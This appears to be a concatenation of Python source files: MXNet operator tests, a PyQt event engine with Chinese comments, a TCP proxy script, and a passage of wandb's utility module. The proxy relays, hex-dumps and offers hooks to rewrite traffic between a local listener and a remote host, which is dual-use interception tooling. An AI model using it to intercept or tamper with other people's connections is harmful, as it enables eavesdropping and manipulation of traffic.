@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], 1, lead_dim]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, L]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input_oneside(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], shape[1], 1]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, 1]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
def test_sldwin_selfatten_operators():
def gen_sliding_window_mask_full(batch_size, num_heads, seq_length, w, symmetric, d):
mask_np = np.zeros((batch_size, num_heads, seq_length, seq_length))
for i in range(seq_length):
end = (i + 1 + w * d) if symmetric else (i + 1)
for j in range(i - w * d, end, d):
if j >= 0 and j < seq_length:
mask_np[:, :, i, j] = 1
return mask_np
def test_sldwin_atten_op_impl(batch_size, seq_length, num_heads,
num_head_units, w, symmetric, d):
# Generate the data
query = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
key = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
value = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
valid_length = np.zeros((batch_size,))
valid_length[:] = seq_length
query = mx.np.array(query, dtype=np.float32)
key = mx.np.array(key, dtype=np.float32)
value = mx.np.array(value, dtype=np.float32)
dilation = mx.np.ones((num_heads,), dtype=np.int32)
dilation[:] = d
valid_length = mx.np.array(valid_length, dtype=np.int32)
query.attach_grad()
key.attach_grad()
value.attach_grad()
with mx.autograd.record():
score = mx.npx.sldwin_atten_score(query, key, dilation,
w=w, symmetric=symmetric)
mask = mx.npx.sldwin_atten_mask_like(score, dilation, valid_length,
w=w, symmetric=symmetric)
score = score * mask
out = mx.npx.sldwin_atten_context(score, value, dilation,
w=w, symmetric=symmetric)
out.backward()
out_np = out.asnumpy()
grad_query = query.grad.asnumpy()
grad_key = key.grad.asnumpy()
grad_value = value.grad.asnumpy()
query.grad[:] = 0
key.grad[:] = 0
value.grad[:] = 0
mask_np = gen_sliding_window_mask_full(batch_size, num_heads, seq_length,
w, symmetric, d)
mask = mx.np.array(mask_np, dtype=np.float32)
with mx.autograd.record():
score = mx.npx.batch_dot(mx.np.swapaxes(query, 1, 2),
mx.np.swapaxes(key, 1, 2),
transpose_b=True)
score = score * mask
out = mx.npx.batch_dot(score,
mx.np.swapaxes(value, 1, 2)).transpose((0, 2, 1, 3))
out.backward()
out_np_gt = out.asnumpy()
grad_query_gt = query.grad.asnumpy()
grad_key_gt = key.grad.asnumpy()
grad_value_gt = value.grad.asnumpy()
assert_allclose(out_np_gt, out_np, 1E-3, 1E-3)
assert_allclose(grad_query_gt, grad_query, 1E-3, 1E-3)
assert_allclose(grad_key_gt, grad_key, 1E-3, 1E-3)
assert_allclose(grad_value_gt, grad_value, 1E-3, 1E-3)
for symmetric in [True, False]:
for d in [1, 2, 3]:
test_sldwin_atten_op_impl(2, 128, 2, 8, 16, symmetric, d)
test_sldwin_atten_op_impl(1, 8, 2, 4, 2, symmetric, d)
def test_zero_sized_dim():
mx.util.set_np_shape(True) # Must be done to prevent zero-sized dimension conversion to 'unknown'
def seq_last():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18938"""
data = mx.nd.array(np.random.rand(1, 0, 0))
res = mx.nd.op.SequenceLast(data)
assert data.shape[1:] == res.shape
def seq_mask():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18939"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceMask(data)
assert data.shape == res.shape
def seq_reverse():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18940"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceReverse(data)
assert data.shape == res.shape
seq_last()
seq_reverse()
seq_mask()
def test_take_grads():
# Test for https://github.com/apache/incubator-mxnet/issues/19817
from mxnet.gluon.nn import HybridBlock, Conv1D, HybridSequential, HybridLambda, Dense
from mxnet import autograd, nd
from mxnet.gluon.loss import L2Loss
def get_grads(model, grads, ctx=mx.cpu()):
pd = model.collect_params()
total_grad_l2 = 0
total_grad_l1 = 0
total_grad_linf = 0
for p in pd:
try:
g = pd[p].grad(ctx) / N
g2 = (g**2).sum().as_in_context(mx.cpu()).asscalar()
g1 = g.abs().sum().as_in_context(mx.cpu()).asscalar()
ginf = g.max().as_in_context(mx.cpu()).asscalar()
total_grad_linf = max(total_grad_linf, ginf)
total_grad_l2 += g2
total_grad_l1 += g1
except Exception:
pass
grads.append(total_grad_l1)
grads.append(total_grad_l2)
grads.append(total_grad_linf)
def run_model(model, loss, X, Y, num_iters=5):
grads = []
for i in range(num_iters):
with autograd.record():
Y_hat = model(X)
ll = loss(Y_hat, Y)
ll = ll.sum()
ll.backward()
get_grads(model, grads)
return grads
def dense_layer():
den = HybridSequential()
den.add(Dense(10, flatten=True, activation='tanh'))
return den
class Model(HybridBlock):
def __init__(self, use_take=False, **kwargs):
super().__init__()
self.use_take = use_take
self.den = dense_layer()
def hybrid_forward(self, F, X, axis=1):
X1 = self.den(X)
if self.use_take:
X2 = F.take(X1, nd.array([0]), axis=axis)
else:
X2 = F.slice_axis(X1, begin=0, end=1, axis=axis)
return X2
N = 30
T = 20
C = 10
X = np.random.normal(size=(N, T, C))
Y = np.random.normal(size=(N, 1))
X, Y = nd.array(X), nd.array(Y)
seed = np.random.randint(1000)
# Using F.take
mx.random.seed(seed)
model = Model(use_take=True)
model.initialize()
loss = L2Loss()
grads1 = run_model(model, loss, X, Y)
# Using F.slice_axis
mx.random.seed(seed)
model2 = Model(use_take=False)
model2.initialize()
grads2 = run_model(model2, loss, X, Y)
for i in range(len(grads1)):
assert_almost_equal(grads1[i], grads2[i])
|
eventEngine.py
|
# encoding: UTF-8
# Standard library modules
from Queue import Queue, Empty
from threading import Thread
from time import sleep
from collections import defaultdict
# Third-party modules
from PyQt4.QtCore import QTimer
# Project-specific modules
from eventType import *
########################################################################
class EventEngine(object):
"""
事件驱动引擎
事件驱动引擎中所有的变量都设置为了私有,这是为了防止不小心
从外部修改了这些变量的值或状态,导致bug。
变量说明
__queue:私有变量,事件队列
__active:私有变量,事件引擎开关
__thread:私有变量,事件处理线程
__timer:私有变量,计时器
__handlers:私有变量,事件处理函数字典
方法说明
__run: 私有方法,事件处理线程连续运行用
__process: 私有方法,处理事件,调用注册在引擎中的监听函数
__onTimer:私有方法,计时器固定事件间隔触发后,向事件队列中存入计时器事件
start: 公共方法,启动引擎
stop:公共方法,停止引擎
register:公共方法,向引擎中注册监听函数
unregister:公共方法,向引擎中注销监听函数
put:公共方法,向事件队列中存入新的事件
事件监听函数必须定义为输入参数仅为一个event对象,即:
函数
def func(event)
...
对象方法
def method(self, event)
...
"""
#----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target = self.__run)
# 计时器,用于触发计时器事件
self.__timer = QTimer()
self.__timer.timeout.connect(self.__onTimer)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
#----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
#----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
#----------------------------------------------------------------------
def __onTimer(self):
"""向事件队列中存入计时器事件"""
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
#----------------------------------------------------------------------
def start(self):
"""引擎启动"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
self.__timer.start(1000)
#----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timer.stop()
# 等待事件处理线程退出
self.__thread.join()
#----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
#----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
#----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
########################################################################
class EventEngine2(object):
"""
    Event-driven engine whose timer runs in a plain Python thread.
"""
#----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
self.__queue = Queue()
# 事件引擎开关
self.__active = False
# 事件处理线程
self.__thread = Thread(target = self.__run)
# 计时器,用于触发计时器事件
self.__timer = Thread(target = self.__runTimer)
self.__timerActive = False # 计时器工作状态
self.__timerSleep = 1 # 计时器触发间隔(默认1秒)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
#----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
#----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
#----------------------------------------------------------------------
def __runTimer(self):
"""运行在计时器线程中的循环函数"""
while self.__timerActive:
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
# 等待
sleep(self.__timerSleep)
#----------------------------------------------------------------------
def start(self):
"""引擎启动"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
self.__timerActive = True
self.__timer.start()
#----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timerActive = False
self.__timer.join()
# 等待事件处理线程退出
self.__thread.join()
#----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
#----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
#----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
########################################################################
class Event:
"""事件对象"""
#----------------------------------------------------------------------
def __init__(self, type_=None):
"""Constructor"""
        self.type_ = type_      # event type
        self.dict_ = {}         # dict holding the event payload
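# Illustrative sketch (added for clarity, not part of the original module): a handler
# takes the Event object as its only argument and reads its payload from event.dict_.
def example_handler(event):
    print('received event of type %s with data %s' % (event.type_, event.dict_))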
#----------------------------------------------------------------------
def test():
"""测试函数"""
import sys
from datetime import datetime
from PyQt4.QtCore import QCoreApplication
def simpletest(event):
        print u'Handling the timer event triggered every second: %s' % str(datetime.now())
app = QCoreApplication(sys.argv)
ee = EventEngine2()
ee.register(EVENT_TIMER, simpletest)
ee.start()
app.exec_()
# Run this script directly to test the engine
if __name__ == '__main__':
test()
|
proxy.py
|
#!/usr/bin/env python3
import sys
import socket
import threading
def server_loop(local_host, local_port, remote_host, remote_port, receive_first):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.bind((local_host, local_port))
except:
print("[!!] Failed to listen on %s:%d" % (local_host, local_port))
print("[!!] Check for other listening socket or correct permissions.")
sys.exit(0)
print("[*] Listening on %s:%d" % (local_host, local_port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# print out the local connection info
print("[==>] Received incoming connection from %s:%d" % (addr[0], addr[1]))
# start a thread to talk to the remote host
proxy_thread = threading.Thread(target=proxy_handler, args=(client_socket, remote_host, remote_port, receive_first))
proxy_thread.start()
# this is a pretty hex dumping function directly taken from the comments here:
# http://code.activestate.com/recipes/142812-hex-dumper/
# https://stackoverflow.com/questions/46869155/trying-to-convert-a-hexdump-from-python2-to-python3
def hexdump(src, length=16):
    # dump the buffer `length` characters per line: offset, hex values, printable text
    result = []
    digits = 4
    for offset in range(0, len(src), length):
        s = src[offset:offset + length]
        hexa = " ".join(["%0*X" % (digits, ord(x)) for x in s])
        text = "".join([x if 0x20 <= ord(x) < 0x7F else "." for x in s])
        result.append("%04X   %-*s   %s" % (offset, length * (digits + 1), hexa, text))
    print('\n'.join(result))
def receive_from(connection):
buffer = ""
    # We set a 5 second timeout; depending on your
# target, this may need to be adjusted
connection.settimeout(5)
try:
# keep reading into the buffer until there's no more data
# or we time out
while True:
data = connection.recv(4096)
if not data:
break
buffer += data.decode()
except:
pass
return buffer
# modify any request destined for the remote host
def request_handler(buffer):
# perform packet modifications
return buffer
# modify any response destined for the local host
def response_handler(buffer):
# perform packet modifications
return buffer
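# Illustrative sketch (added for clarity, not part of the original script): a
# request_handler that rewrites an HTTP Host header before the data is relayed.
# The hostnames used here are hypothetical placeholders.
def example_request_handler(buffer):
    return buffer.replace("Host: localhost", "Host: internal.example.org")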
def proxy_handler(client_socket, remote_host, remote_port, receive_first):
# connect to the remote host
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((remote_host, remote_port))
    # receive data from the remote end if necessary
if receive_first:
remote_buffer = receive_from(remote_socket)
hexdump(remote_buffer)
#send it to our response handler
remote_buffer = response_handler(remote_buffer)
# if we have data to send to our local client, send it
if len(remote_buffer):
print("[<==] Sending %d bytes to localhost." % len(remote_buffer))
client_socket.send(remote_buffer.encode())
    # now let's loop: read from local, send to remote, then send to local
# rinse, wash, repeat
while True:
# read from local host
local_buffer = receive_from(client_socket)
if len(local_buffer):
print("[==>] Received %d bytes from localhost." % len(local_buffer))
hexdump(local_buffer)
# send it to our request handler
local_buffer = request_handler(local_buffer)
# send off the data to the remote host
remote_socket.send(local_buffer.encode())
print("[==>] Sent to remote.")
# receive back the response
remote_buffer = receive_from(remote_socket)
if len(remote_buffer):
print("[<==] Received %d bytes from remote." % len(remote_buffer))
hexdump(remote_buffer)
# send to our response handler
remote_buffer = response_handler(remote_buffer)
# send the response to the local socket
client_socket.send(remote_buffer.encode())
print("[<==] Sent to localhost.")
# if no more data on either side, close the connections
if not len(local_buffer) or not len(remote_buffer):
client_socket.close()
remote_socket.close()
print("[*] No more data. Closing connections.")
break
def main():
# no fancy commandline parsing here
if len(sys.argv[1:]) != 5:
print(
"""
Usage: ./proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]
Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True
"""
)
sys.exit(0)
# setup local listening parameters
local_host = sys.argv[1]
local_port = int(sys.argv[2])
# setup remote target
remote_host = sys.argv[3]
remote_port = int(sys.argv[4])
# this tells our proxy to connect and receive data
# before sending to the remote host
receive_first = sys.argv[5]
if "True" in receive_first:
receive_first = True
else:
receive_first = False
# now spin up our listening socket
server_loop(local_host, local_port, remote_host, remote_port, receive_first)
if __name__ == "__main__":
main()
|
util.py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import base64
import binascii
import colorsys
import contextlib
import codecs
import errno
import functools
import gzip
import hashlib
import json
import logging
import math
import numbers
import traceback
import os
import re
import shlex
import socket
import sys
import threading
import time
import random
import shortuuid
import importlib
import tarfile
import tempfile
import types
from typing import Optional
import yaml
from datetime import date, datetime
import platform
from six.moves import urllib
from typing import Any, Dict
import requests
import six
from six.moves import queue, input
from sys import getsizeof
from six.moves.collections_abc import Mapping, Sequence
from importlib import import_module
import sentry_sdk
from sentry_sdk import capture_exception
from sentry_sdk import capture_message
from wandb.env import error_reporting_enabled, get_app_url
import wandb
from wandb import env
from wandb.errors import CommError, term
logger = logging.getLogger(__name__)
_not_importable = set()
# Boolean, unsigned integer, signed integer, float, complex.
NUMERIC_KINDS = set("buifc")
MAX_LINE_BYTES = (10 << 20) - (100 << 10) # imposed by back end
IS_GIT = os.path.exists(os.path.join(os.path.dirname(__file__), "..", ".git"))
RE_WINFNAMES = re.compile(r'[<>:"/\?*]')
# these match the environments for gorilla
if IS_GIT:
SENTRY_ENV = "development"
else:
SENTRY_ENV = "production"
if error_reporting_enabled():
sentry_sdk.init(
dsn="https://a2f1d701163c42b097b9588e56b1c37e@o151352.ingest.sentry.io/5288891",
release=wandb.__version__,
default_integrations=False,
environment=SENTRY_ENV,
)
POW_10_BYTES = [
("B", 10 ** 0),
("KB", 10 ** 3),
("MB", 10 ** 6),
("GB", 10 ** 9),
("TB", 10 ** 12),
("PB", 10 ** 15),
("EB", 10 ** 18),
]
POW_2_BYTES = [
("B", 2 ** 0),
("KiB", 2 ** 10),
("MiB", 2 ** 20),
("GiB", 2 ** 30),
("TiB", 2 ** 40),
("PiB", 2 ** 50),
("EiB", 2 ** 60),
]
def sentry_message(message):
if error_reporting_enabled():
capture_message(message)
def sentry_exc(exc, delay=False):
if error_reporting_enabled():
if isinstance(exc, six.string_types):
capture_exception(Exception(exc))
else:
capture_exception(exc)
if delay:
time.sleep(2)
def sentry_reraise(exc):
"""Re-raise an exception after logging it to Sentry
Use this for top-level exceptions when you want the user to see the traceback.
Must be called from within an exception handler.
"""
sentry_exc(exc)
# this will messily add this "reraise" function to the stack trace
# but hopefully it's not too bad
six.reraise(type(exc), exc, sys.exc_info()[2])
def sentry_set_scope(process_context, entity, project, email=None, url=None):
# Using GLOBAL_HUB means these tags will persist between threads.
# Normally there is one hub per thread.
with sentry_sdk.hub.GLOBAL_HUB.configure_scope() as scope:
scope.set_tag("process_context", process_context)
scope.set_tag("entity", entity)
scope.set_tag("project", project)
if email:
scope.user = {"email": email}
if url:
scope.set_tag("url", url)
def vendor_setup():
"""This enables us to use the vendor directory for packages we don't depend on
Returns a function to call after imports are complete. Make sure to call this
function or you will modify the user's path which is never good. The pattern should be:
reset_path = vendor_setup()
# do any vendor imports...
reset_path()
"""
original_path = [directory for directory in sys.path]
def reset_import_path():
sys.path = original_path
parent_dir = os.path.abspath(os.path.dirname(__file__))
vendor_dir = os.path.join(parent_dir, "vendor")
vendor_packages = ("gql-0.2.0", "graphql-core-1.1")
package_dirs = [os.path.join(vendor_dir, p) for p in vendor_packages]
for p in [vendor_dir] + package_dirs:
if p not in sys.path:
sys.path.insert(1, p)
return reset_import_path
def apple_gpu_stats_binary():
parent_dir = os.path.abspath(os.path.dirname(__file__))
return os.path.join(parent_dir, "bin", "apple_gpu_stats")
def vendor_import(name):
reset_path = vendor_setup()
module = import_module(name)
reset_path()
return module
def get_module(name, required=None):
"""
Return module or None. Absolute import is required.
:param (str) name: Dot-separated module path. E.g., 'scipy.stats'.
:param (str) required: A string to raise a ValueError if missing
:return: (module|None) If import succeeds, the module will be returned.
"""
if name not in _not_importable:
try:
return import_module(name)
except Exception as e:
_not_importable.add(name)
msg = "Error importing optional module {}".format(name)
if required:
logger.exception(msg)
if required and name in _not_importable:
raise wandb.Error(required)
def get_optional_module(name) -> Optional["importlib.ModuleInterface"]:
return get_module(name)
class LazyLoader(types.ModuleType):
"""Lazily import a module, mainly to avoid pulling in large dependencies.
    We use this for TensorFlow and other optional libraries, primarily at the top module level.
"""
# The lint error here is incorrect.
def __init__(
self, local_name, parent_module_globals, name, warning=None
): # pylint: disable=super-on-old-class
self._local_name = local_name
self._parent_module_globals = parent_module_globals
self._warning = warning
super(LazyLoader, self).__init__(name)
def _load(self):
"""Load the module and insert it into the parent's globals."""
# Import the target module and insert it into the parent's namespace
module = importlib.import_module(self.__name__)
self._parent_module_globals[self._local_name] = module
# Emit a warning if one was specified
if self._warning:
print(self._warning)
# Make sure to only warn once.
self._warning = None
# Update this object's dict so that if someone keeps a reference to the
# LazyLoader, lookups are efficient (__getattr__ is only called on lookups
# that fail).
self.__dict__.update(module.__dict__)
return module
def __getattr__(self, item):
module = self._load()
return getattr(module, item)
def __dir__(self):
module = self._load()
return dir(module)
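def _lazy_loader_example():
    # Illustrative sketch (added for clarity, not part of the original module): `json`
    # stands in for a heavy optional dependency; the real module is only loaded (or
    # fetched from sys.modules) on the first attribute access on the proxy object.
    lazy_json = LazyLoader("lazy_json", globals(), "json")
    return lazy_json.dumps({"lazy": True})  # triggers the actual import of `json`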
class PreInitObject(object):
def __init__(self, name):
self._name = name
def __getitem__(self, key):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key)
)
def __setitem__(self, key, value):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key)
)
def __setattr__(self, key, value):
if not key.startswith("_"):
raise wandb.Error(
"You must call wandb.init() before {}.{}".format(self._name, key)
)
else:
return object.__setattr__(self, key, value)
def __getattr__(self, key):
if not key.startswith("_"):
raise wandb.Error(
"You must call wandb.init() before {}.{}".format(self._name, key)
)
else:
raise AttributeError()
np = get_module("numpy")
# TODO: Revisit these limits
VALUE_BYTES_LIMIT = 100000
def app_url(api_url):
"""Returns the frontend app url without a trailing slash."""
# TODO: move me to settings
app_url = get_app_url()
if app_url is not None:
return app_url.strip("/")
if "://api.wandb.test" in api_url:
# dev mode
return api_url.replace("://api.", "://app.").strip("/")
elif "://api.wandb." in api_url:
# cloud
return api_url.replace("://api.", "://").strip("/")
elif "://api." in api_url:
# onprem cloud
return api_url.replace("://api.", "://app.").strip("/")
# wandb/local
return api_url
def get_full_typename(o):
"""We determine types based on type names so we don't have to import
(and therefore depend on) PyTorch, TensorFlow, etc.
"""
instance_name = o.__class__.__module__ + "." + o.__class__.__name__
if instance_name in ["builtins.module", "__builtin__.module"]:
return o.__name__
else:
return instance_name
def get_h5_typename(o):
typename = get_full_typename(o)
if is_tf_tensor_typename(typename):
return "tensorflow.Tensor"
elif is_pytorch_tensor_typename(typename):
return "torch.Tensor"
else:
return o.__class__.__module__.split(".")[0] + "." + o.__class__.__name__
def is_uri(string):
parsed_uri = urllib.parse.urlparse(string)
return len(parsed_uri.scheme) > 0
def local_file_uri_to_path(uri):
"""
Convert URI to local filesystem path.
No-op if the uri does not have the expected scheme.
"""
path = urllib.parse.urlparse(uri).path if uri.startswith("file:") else uri
return urllib.request.url2pathname(path)
def get_local_path_or_none(path_or_uri):
"""Check if the argument is a local path (no scheme or file:///) and return local path if true,
None otherwise.
"""
parsed_uri = urllib.parse.urlparse(path_or_uri)
if (
len(parsed_uri.scheme) == 0
or parsed_uri.scheme == "file"
and len(parsed_uri.netloc) == 0
):
return local_file_uri_to_path(path_or_uri)
else:
return None
def make_tarfile(output_filename, source_dir, archive_name, custom_filter=None):
# Helper for filtering out modification timestamps
def _filter_timestamps(tar_info):
tar_info.mtime = 0
return tar_info if custom_filter is None else custom_filter(tar_info)
unzipped_filename = tempfile.mktemp()
try:
with tarfile.open(unzipped_filename, "w") as tar:
tar.add(source_dir, arcname=archive_name, filter=_filter_timestamps)
# When gzipping the tar, don't include the tar's filename or modification time in the
# zipped archive (see https://docs.python.org/3/library/gzip.html#gzip.GzipFile)
with gzip.GzipFile(
filename="", fileobj=open(output_filename, "wb"), mode="wb", mtime=0
) as gzipped_tar, open(unzipped_filename, "rb") as tar:
gzipped_tar.write(tar.read())
finally:
os.remove(unzipped_filename)
def _user_args_to_dict(arguments):
user_dict = {}
i = 0
while i < len(arguments):
arg = arguments[i]
split = arg.split("=", maxsplit=1)
# flag arguments don't require a value -> set to True if specified
if len(split) == 1 and (
i + 1 >= len(arguments) or arguments[i + 1].startswith("-")
):
name = split[0].lstrip("-")
value = True
i += 1
elif len(split) == 1 and not arguments[i + 1].startswith("-"):
name = split[0].lstrip("-")
value = arguments[i + 1]
i += 2
elif len(split) == 2:
name = split[0].lstrip("-")
value = split[1]
i += 1
if name in user_dict:
wandb.termerror("Repeated parameter: '%s'" % name)
sys.exit(1)
user_dict[name] = value
return user_dict
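def _user_args_to_dict_example():
    # Illustrative sketch (added for clarity, not part of the original module):
    # "--key=value" and "--key value" both map to string values, bare flags become True.
    args = ["--epochs=3", "--lr", "0.1", "--verbose"]
    assert _user_args_to_dict(args) == {"epochs": "3", "lr": "0.1", "verbose": True}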
def is_tf_tensor(obj):
import tensorflow
return isinstance(obj, tensorflow.Tensor)
def is_tf_tensor_typename(typename):
return typename.startswith("tensorflow.") and (
"Tensor" in typename or "Variable" in typename
)
def is_tf_eager_tensor_typename(typename):
return typename.startswith("tensorflow.") and ("EagerTensor" in typename)
def is_pytorch_tensor(obj):
import torch
return isinstance(obj, torch.Tensor)
def is_pytorch_tensor_typename(typename):
return typename.startswith("torch.") and (
"Tensor" in typename or "Variable" in typename
)
def is_jax_tensor_typename(typename):
return typename.startswith("jaxlib.") and "DeviceArray" in typename
def get_jax_tensor(obj):
import jax
return jax.device_get(obj)
def is_fastai_tensor_typename(typename):
return typename.startswith("fastai.") and ("Tensor" in typename)
def is_pandas_data_frame_typename(typename):
return typename.startswith("pandas.") and "DataFrame" in typename
def is_matplotlib_typename(typename):
return typename.startswith("matplotlib.")
def is_plotly_typename(typename):
return typename.startswith("plotly.")
def is_plotly_figure_typename(typename):
return typename.startswith("plotly.") and typename.endswith(".Figure")
def is_numpy_array(obj):
return np and isinstance(obj, np.ndarray)
def is_pandas_data_frame(obj):
return is_pandas_data_frame_typename(get_full_typename(obj))
def ensure_matplotlib_figure(obj):
"""Extract the current figure from a matplotlib object or return the object if it's a figure.
raises ValueError if the object can't be converted.
"""
import matplotlib
from matplotlib.figure import Figure
# plotly and matplotlib broke in recent releases,
# this patches matplotlib to add a removed method that plotly assumes exists
from matplotlib.spines import Spine
def is_frame_like(self):
"""Return True if directly on axes frame.
This is useful for determining if a spine is the edge of an
old style MPL plot. If so, this function will return True.
"""
position = self._position or ("outward", 0.0)
if isinstance(position, str):
if position == "center":
position = ("axes", 0.5)
elif position == "zero":
position = ("data", 0)
if len(position) != 2:
raise ValueError("position should be 2-tuple")
position_type, amount = position
if position_type == "outward" and amount == 0:
return True
else:
return False
Spine.is_frame_like = is_frame_like
if obj == matplotlib.pyplot:
obj = obj.gcf()
elif not isinstance(obj, Figure):
if hasattr(obj, "figure"):
obj = obj.figure
# Some matplotlib objects have a figure function
if not isinstance(obj, Figure):
raise ValueError(
"Only matplotlib.pyplot or matplotlib.pyplot.Figure objects are accepted."
)
return obj
def matplotlib_to_plotly(obj):
obj = ensure_matplotlib_figure(obj)
tools = get_module(
"plotly.tools",
required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`",
)
return tools.mpl_to_plotly(obj)
def matplotlib_contains_images(obj):
obj = ensure_matplotlib_figure(obj)
return any(len(ax.images) > 0 for ax in obj.axes)
def json_friendly(obj):
"""Convert an object into something that's more becoming of JSON"""
converted = True
typename = get_full_typename(obj)
if is_tf_eager_tensor_typename(typename):
obj = obj.numpy()
elif is_tf_tensor_typename(typename):
try:
obj = obj.eval()
except RuntimeError:
obj = obj.numpy()
elif is_pytorch_tensor_typename(typename) or is_fastai_tensor_typename(typename):
try:
if obj.requires_grad:
obj = obj.detach()
except AttributeError:
pass # before 0.4 is only present on variables
try:
obj = obj.data
except RuntimeError:
pass # happens for Tensors before 0.4
if obj.size():
obj = obj.cpu().detach().numpy()
else:
return obj.item(), True
elif is_jax_tensor_typename(typename):
obj = get_jax_tensor(obj)
if is_numpy_array(obj):
if obj.size == 1:
obj = obj.flatten()[0]
elif obj.size <= 32:
obj = obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
